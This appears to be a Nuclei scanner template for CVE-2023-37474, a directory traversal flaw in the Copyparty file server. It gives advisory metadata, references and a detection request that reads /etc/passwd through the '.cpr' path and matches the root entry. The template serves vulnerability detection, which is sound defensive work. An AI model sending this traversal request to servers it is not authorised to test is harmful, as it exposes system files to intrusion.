id: CVE-2023-37474 info: name: Copyparty <= 1.8.2 - Directory Traversal author: shankar acharya,theamanrawat severity: high description: | Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. reference: - https://github.com/9001/copyparty/ - https://www.exploit-db.com/exploits/51636 - https://nvd.nist.gov/vuln/detail/CVE-2023-37474 - http://packetstormsecurity.com/files/173822/Copyparty-1.8.2-Directory-Traversal.html - https://github.com/9001/copyparty/commit/043e3c7dd683113e2b1c15cacb9c8e68f76513ff classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-37474 cwe-id: CWE-22 epss-score: 0.02398 epss-percentile: 0.88725 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: copyparty_project product: copyparty tags: packetstorm,cve,cve2023,traversal,copyparty http: - method: GET path: - "{{BaseURL}}/.cpr/%2Fetc%2Fpasswd" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # digest: 4a0a0047304502210087ed842526a020825613bc5b3da26d09db4199a629082db266ba1d78a4da6f2d02202711ea26dbe7b345277411feee3aa878e1f851f21c3733b974eacb70fd1db846:922c64590222798bb761d5b6d8e72950